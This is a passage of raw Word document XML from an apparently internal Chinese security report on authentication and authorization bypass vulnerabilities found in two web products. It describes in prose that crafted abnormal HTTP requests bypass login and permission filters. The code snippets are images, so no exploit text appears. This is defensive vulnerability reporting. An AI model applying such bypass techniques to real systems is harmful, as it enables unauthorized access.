      <w:tr w:rsidR="000D3A5F" w:rsidTr="005857D3">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="341"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="002E2679"/>
    <w:p w:rsidR="00C91246" w:rsidRDefault="00C91246" w:rsidP="00C6391F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>背景</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6391F" w:rsidRPr="008C089C" w:rsidRDefault="00C6391F" w:rsidP="00C6391F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C089C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>近期ICSL在对公司产品测试过程中，发现两款Web产品存在致命的认证、鉴权被绕过漏洞。其中一款产品是基于Java开发的主机型Web应用，一款是基于CGI的嵌入型Web应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00775E21" w:rsidRPr="00C82B52" w:rsidRDefault="00C6391F" w:rsidP="00136BAD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C089C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在6月份将这两个漏洞给UK专家汇报后，UK专家认为：认证、鉴权、会话管理，是WEB系统典型的场景，对于一些业界成熟的方案，华为总想根据应用场景，做一些修改并自行进行开发，但同时引入很多严重的安全风险。建议华为对现有产品做排查，并应直接应用业界成熟的实践。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021104" w:rsidRDefault="004B0690" w:rsidP="00021104">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="006F4708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021104" w:rsidRDefault="00F15059" w:rsidP="00021104">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机型</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00021104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证鉴权被绕过</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1E0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1668"/>
        <w:gridCol w:w="3827"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1893"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00B2254C" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00B2254C" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>产品</w:t>
            </w:r>
            <w:r w:rsidRPr="00164F65">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WEB</w:t>
            </w:r>
            <w:r w:rsidRPr="00164F65">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="宋体" w:hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>页面登录权限校验漏洞技术分析报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00076B09" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全问题编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00076B09" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00076B09">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00076B09" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>严重级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6854" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E63E4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>产品简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00ED74D8" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00ED74D8" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLineChars="150" w:firstLine="315"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>某产品</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00D43E52">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6" w:themeFill="background1" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00C21020" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题所在模块功能、使用场景说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00D47B16" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00D47B16" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLineChars="150" w:firstLine="315"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>该产品的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>管理系统，正常场景下需要用户登录并且具有相应的操作授权之后才可以进行各种管理工作。但是该系统中的用户认证和权限校验模块逻辑存在漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>可以构造异常的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>报文绕过系统的认证和鉴权系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB3E2F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00DC57FC" w:rsidTr="00303753">
        <w:trPr>
          <w:trHeight w:val="6024"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003169AC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>代码片段</w:t>
            </w:r>
            <w:r w:rsidRPr="003169AC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>认证过滤器逻辑漏洞：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5265420" cy="487680"/>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65420" cy="487680"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5273040" cy="784860"/>
                  <wp:effectExtent l="19050" t="0" r="381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3040" cy="784860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00AF66E2" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3722370" cy="537915"/>
                  <wp:effectExtent l="19050" t="0" r="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722370" cy="537915"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00AF66E2" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF66E2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>权限过滤器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>逻辑漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF66E2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">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Pr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3585210" cy="704608"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="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585210" cy="704608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>TOKEN</w:t>
            </w:r>
            <w:r w:rsidRPr="00242266">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>代码漏洞：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00242266" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0058099D">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4824536" cy="891018"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="16" name="图片 1"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1036" name="Picture 12"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
